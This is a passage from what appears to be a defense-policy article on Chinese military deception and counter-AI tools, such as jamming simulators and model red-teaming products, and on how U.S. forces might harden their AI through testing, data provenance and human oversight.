Electronic-warfare vendors jam communications links and network connections, following the PLA’s soft-kill computing resources concept. Saturating the spectrum with clutter and false signals forces the enemy’s AI and limited computing power to waste time and resources, while friendly forces maintain a clear picture. Chengdu M&S Electronics lists gear that generates false target signals, fields radar decoy rounds, and provides simulators that play back hostile radar and communications signals to confuse receivers. Balu Electronics sells communications-jamming simulators that build complex electromagnetic environments and drive multi-target interference.
Meanwhile, Chinese tech firms are developing counter-AI software. Tencent Cloud runs a large-model red-team program and offers tools that monitor and lock down model inputs and outputs to block prompt injection, tainted data, and leaks. Qi’anxin’s model protection fence and GPT-Guard add tools that simulate attacks and watch inputs and outputs for tampering, and RealAI’s RealSafe automatically builds test cases that try to fool models and checks how well they hold up. Marketed as defense, these tools also sharpen tradecraft for pressuring an opponent’s algorithms.
U.S. response
U.S. planners need not look to China to understand that they must assume their AI will be contested in future battles. The PLA’s work in this space reflects the lessons from Ukraine, where deception operations have taken on a new level of importance in a battlefield saturated with sensors. It also heightens the concern of a growing “deception gap,” where if the U.S. military and its partners cannot master today’s emerging tools, they may fall behind in a critical field.
Answering that playbook begins with structured red-teaming and rigorous test and evaluation, not just one-off demos. The U.S. already has building blocks, including DARPA’s GARD on adversarial robustness, IARPA’s TrojAI on backdoor detection, NIST’s AI Risk Management Framework for evaluation and risk controls, and DOT&E guidance for continuous test and evaluation across the enterprise. Planners must harden pipelines and models by protecting data provenance, detecting anomalies, preserving safe fallbacks, and monitoring model health in the field.
Keeping humans decisively on top of the loop remains essential and is codified in DoD Directive 3000.09 on autonomy in weapons. Units should also upgrade the opposing forces they train against, giving them AI-enabled reconnaissance and deception kits and ensuring that “real and fake” targets are part of every major exercise.
Failure to do so will mean that the American military’s enthusiastic embrace of AI leads not to new advantages, but new vulnerabilities and even loss in this crucial new aspect of warfare.
Yes
No (Focus on Intel).webp)
.webp)
.webp)
.webp)
.webp)
.webp)
.webp)
.webp)
.webp)
